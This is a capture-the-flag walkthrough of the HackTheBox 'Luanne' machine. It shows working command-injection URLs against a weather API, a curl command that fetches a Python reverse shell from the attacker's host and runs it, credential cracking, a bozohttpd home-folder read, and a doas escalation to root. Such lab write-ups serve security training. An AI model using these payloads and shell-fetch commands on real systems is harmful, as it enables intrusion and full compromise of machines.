Luanne Box Writeup Walkthrough Htb Hackthebox – [HTB] – HackTheBox

This article shows how to hack the Luanne box and obtain both user.txt and root.txt.

Luanne is a machine on the HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article will show how to hack the Luanne box and get user.txt and root.txt.

First, I used NMAP to scan the open ports and see if there are any ports open. As we can see, the open ports are 22, 80, and 9001.

ScanPorts
Ports Scan

Then, navigate to the following URL. Observe that I obtained an endpoint.

http://10.129.121.38/robots.txt

ValidEndpoint
Valid Endpoint

The city parameter is vulnerable to command injection. I can simply execute an OS command by navigating to the following URL.

1
http://10.129.121.38/weather/forecast?city=a') os.execute('OS_Command')--

For example:

1
http://10.129.121.38/weather/forecast?city=a') os.execute('id')--
EndpointRCE
Endpoint RCE

Due to the OS is not a standard Linux OS, and there are only limited commands available. I then find out the “python” application location by using the “find” command.

1
http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27find+/+-name+"*python3.7*"%27)--
PythonPath
Find Python Path

Then, I created a python reverse shell, and hosted an HTTP server locally.

PythonReverseShell
Create a Python Reverse Shell

Download the reverse shell to /tmp folder by navigating to the following URL:

1
http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27curl+http://10.10.17.26/1.py+-o+/tmp/1.py%27)--

Finally, I gained a reverse shell by navigating to the following URL.

1
http://10.129.121.38/weather/forecast?city=a%27)%20os.execute(%27/usr/pkg/bin/python3.7+/tmp/1.py%27)--
GainReverseShell
Gain Reverse Shell

Execute the following command to obtain open ports. Observe that port 3001 is open locally.

1
netstat -an
CheckLocalOpenPorts
Check Local Open Ports

There is also a .htpasswd file.

htpasswdFile
htpasswd File

After cracking the .htpasswd file, I gained the following credential:

Credential

Username: webapi_user

Password: iamthebest

Execute the following command to visit the website that hosts on port 3001:

Observe that the server is running bozohttpd as shown in the screenshot below:

htpasswdFile
htpasswd File

According to this Article, there are several vulnerabilities on this application (CVE-2010-2320,CVE-2010-2195). Attackers are able to visit a user’s home folder by providing a “~”.

Attempted to access r.michaels home folder by executing the following command.

1
curl -v --user webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

Observe that successful access as shown in the screenshot below:

bozohttpdVulnerability
Bozohttpd Vulnerability

Download the id_rsa file, and then login as r.michaels user.

I then obtained the user.txt file.

LuanneUserTxt
Luanne User.txt

After enumeration, I obtained a backup file: /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc

Attempted to decrypt it by OpenSSL,, but it did not work. Then, I used the following command to decrypt it:

1
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output=/tmp/1.tar.gz

Observe that decrypt successfully as shown in the screenshot below:

LuanneNetpgpDecrypt
Netpgp Decrypt

Then, I identified another .htpasswd file in the tar file.

AnotherhtpasswdFile
Another htpasswd File

After cracking the hash, I obtained another credential:

Credential

Username: webapi_user

Password: littlebear

Check the doas configuration, and obtain that the current user is able to run commands as root.

1
cat /usr/pkg/etc/doas.conf

Then, using the above credential and execute the following command to swap to root user.

1
doas -u root /bin/sh
ObtainRootTxt
Obtain Root.txt